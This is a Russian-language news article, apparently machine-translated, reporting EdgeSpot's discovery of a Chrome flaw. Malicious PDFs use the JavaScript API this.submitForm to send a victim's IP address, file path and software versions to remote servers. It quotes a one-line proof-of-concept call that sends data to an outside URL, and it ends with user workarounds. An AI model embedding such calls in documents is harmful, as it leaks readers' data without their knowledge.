Уязвимость Chrome позволяет хакерам собирать пользовательские данные через pdf-файлы.
Оглавление:
Видео: Мультики про машинки новые серии 2017 - Кто сильнее! Лучшие мультфильмы для детей /#мультик игра 2024
Служба обнаружения эксплойтов EdgeSpot обнаружила интригующую уязвимость Chrome нулевого дня, использующую документы PDF. Уязвимость позволяет злоумышленникам собирать конфиденциальные данные, используя вредоносные документы PDF, открытые в Chrome.
Как только жертва открывает соответствующие файлы PDF в Google Chrome, вредоносная программа начинает работать в фоновом режиме, собирая пользовательские данные.
Затем данные передаются на удаленный сервер, который контролируется хакерами. Вам может быть интересно узнать, какие данные высасываются злоумышленниками, они нацелены на следующие данные на вашем ПК:
- айпи адрес
- Полный путь к файлу PDF в системе
- Версии для ОС и Chrome
Остерегайтесь вредоносных PDF-файлов
Вы можете быть удивлены, узнав, что ничего не происходит, когда Adobe Reader используется для открытия PDF-файлов. Кроме того, HTTP POST-запросы используются для передачи данных на удаленные серверы без какого-либо вмешательства пользователя.
Эксперты заметили, что один из двух доменов readnotifycom или burpcollaboratornet получает данные.
Вы можете представить себе интенсивность атаки, если учесть тот факт, что большинство антивирусных программ не может обнаружить образцы, обнаруженные EdgeSpot.
Эксперты выясняют, что злоумышленники используют API-интерфейс «this.submitForm ()» PDF Javascript для сбора конфиденциальной информации пользователей.
Мы протестировали его с минимальным PoC, простой вызов API, такой как «this.submitForm ('http://google.com/test')», заставит Google Chrome отправлять личные данные на google.com.
Эксперты фактически обнаружили, что эта ошибка Chrome использовалась двумя различными наборами вредоносных PDF-файлов. Оба они были распространены в октябре 2017 года и сентябре 2018 года соответственно.
В частности, собранные данные могут быть использованы злоумышленниками для точной настройки атак в будущем. Отчеты предполагают, что первая партия файлов была скомпилирована с использованием службы отслеживания PDF ReadNotify.
Пользователи могут использовать сервис для отслеживания просмотров пользователей. EdgeSpot не поделился какими-либо подробностями относительно характера второго набора файлов PDF.
Как оставаться защищенным
Служба обнаружения эксплойтов EdgeSpot хотела предупредить пользователей Chrome о потенциальных рисках, поскольку ожидается, что исправление не будет выпущено в ближайшем будущем.
EdgeSpot сообщил Google об этой уязвимости в прошлом году, и компания пообещала выпустить патч в конце апреля. ЧАС
тем не менее, вы можете использовать временное решение проблемы, локально просматривая полученные документы PDF с помощью альтернативного приложения для чтения PDF.
Кроме того, вы также можете открыть свои документы PDF в Chrome, отключив свои системы от Интернета. Между тем, вы можете дождаться обновления Chrome 74, которое ожидается 23 апреля.
Уязвимость Outlook позволяет хакерам красть хеши паролей
Microsoft Outlook является одной из самых популярных почтовых платформ в мире. Я лично полагаюсь на свой адрес электронной почты Outlook для выполнения рабочих и личных задач. К сожалению, Outlook может быть не таким безопасным, как нам, пользователям, хотелось бы думать. Согласно отчету, опубликованному Институтом разработки программного обеспечения Карнеги-Меллона, Outlook ...
Краткое руководство, чтобы помешать Microsoft собирать ваши данные
Вчерашние новости о сборе данных Microsoft оставили многих пользователей неуверенными в том, как помешать Microsoft собирать их данные. Читайте дальше, узнайте как.
Хватит Google и Facebook собирать ваши личные данные
Знаете ли вы, что 76% всех сайтов скрывают трекеры Google, а 24% - скрытые трекеры Facebook? Что ж, пора тебе узнать. Это важные данные, полученные в рамках проекта Принстонской веб-прозрачности и подотчетности. Воздействие этих двух крупных компаний на нашу конфиденциальность огромно, и мы не можем его недооценивать. Скрытые трекеры обычно…